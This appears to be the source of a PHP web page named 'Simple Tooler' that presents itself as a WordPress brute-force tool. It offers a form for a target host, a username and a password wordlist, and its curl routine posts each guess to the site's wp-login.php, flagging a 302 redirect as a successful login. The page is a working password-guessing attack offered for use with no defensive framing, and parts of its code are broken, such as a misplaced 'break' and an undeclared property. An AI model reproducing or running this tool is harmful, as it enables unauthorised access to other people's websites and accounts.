<html><head><title>Simple Tooler</title><head> <meta charset="utf-8">

1. <html>
2. <head>
3. <title>Simple Tooler</title>
4. <head>
5. <meta charset="utf-8">
6. <meta name="viewport" content="width=device-width; initial-scale=1.0; maximum-scale=1.0;">
7. <style type='text/css'>
8. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
9. html {
10. background-color: black;
11. min-height: 100%;
12. background-repeat: no-repeat;
13. background-attachment: fixed;
14. background-position: center;
15. background-size: cover;
16. color: #ffffff;
17. font-family: 'Ubuntu';
18. font-size: 13px;
19. width: 100%;
20. padding: 0px;
21. -moz-border-radius: 1px;
22. -webkit-border-radius: 1px;
23. border-radius: 1px;
24. }
25. li {
26. display: inline;
27. margin: 1px;
28. padding: 1px;
29. -moz-border-radius: 1px;
30. -webkit-border-radius: 1px;
31. border-radius: 1px;
32. }
33.  
34.  
35.  
36. a {
37. padding: 1px;
38. border: 1px solid darkred;
39. color: red;
40. text-decoration:
41. none;color: red;
42. font-size:14px;
43. }
44.  
45. a:hover {
46. color: darkred;
47. text-decoration: underline;
48. }
49.  
50. b {
51. color: darkred;
52.  
53. }
54. .area{
55. width:400px;
56. height:350px;
57. resize:none;
58. }
59. input[type=text],input[type=submit] {
60. border:2px solid darkred;
61. background:transparent;
62. color:red;
63. font-weight:bold;
64. margin:px;
65. padding:5px
66. }
67. </style>
68. </head>
69. <hr color=darkred>
70. <br><br><center>
71. <font face="tahoma" style="color:darkred;text-shadow:0px 1px 5px #000;font-size:25px"><pre>Wordpress bruteforce</pre></font>
72. <?php
73. set_time_limit(0);
74. error_reporting(0);
75.  
76. class Wp{
77.  
78. private $host;
79. private $user;
80. private $open;
81. private $lista;
82.  
83. public function banner() {
84. echo("
85. <html>
86. <head>
87.  
88. <body>
89. <form action='' method='POST'>
90. Host:<input type='text' name='host' size='40'><br>
91. User:<input type='text' name='user' size='25'><br>
92. <center>Wordlist</center>
93. <center><textarea class='area' name='lista'></textarea><br><br><center>
94. <center><input type='Submit' value='Start'></center>
95. </form>
96. </body>
97. </html>");
98. }
99.  
100. public function extract_post() {
101. $this->host = $_POST["host"];
102. $this->user = $_POST["user"];
103. $this->open = $_POST["lista"];
104. }
105.  
106. public function Xregex() {
107. if(preg_match("@/wp-login.php@", $this->host)) {
108. return true;
109. } else {
110. $this->host = $_POST["host"]."/wp-login.php";
111. }
112. }
113.  
114. public function brute() {
115. $lista = array_filter(explode("\n", $this->open));
116. foreach($lista as $this->lista) {
117. for($i=0; $i < count($this->lista); $i++) {
118. $this->Xcurl();
119. }
120. }
121. }
122.  
123. private function cool() {
124. echo "Host:"."<font color='white'>{$this->host}</font>";
125. echo " User:"."<font color='white'>{$this->user}</font>";
126. echo " Pass:"."<font color='white'>{$this->lista}</font>";
127. }
128.  
129. private function Xcurl() {
130. $curl = curl_init();
131. curl_setopt($curl, CURLOPT_URL, $this->host);
132. curl_setopt($curl, CURLOPT_USERAGENT, $this->useragent);
133. curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
134. curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 10);
135. curl_setopt($curl, CURLOPT_POST, true);
136. curl_setopt($curl, CURLOPT_POSTFIELDS, "log=$this->user&pwd=$this->lista&wp-submit=Login&redirect_to=$this->host/wp-admin/");
137. $exec = curl_exec($curl);
138. $http = curl_getinfo($curl, CURLINFO_HTTP_CODE);
139. $this->cool();
140. if($http == 302) {
141. echo "<font color='#00FF00'> [+] Successfull!!</font><br>";
142. break;
143. } else {
144. echo "<font color='red'>Failed</font><br>";
145. }
146. curl_close($curl);
147. }
148. }
149.  
150. $wp = new Wp();
151. $wp->useragent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0";
152. $wp->banner();
153. $wp->extract_post();
154. $wp->Xregex();
155. $wp->brute();
156. ?>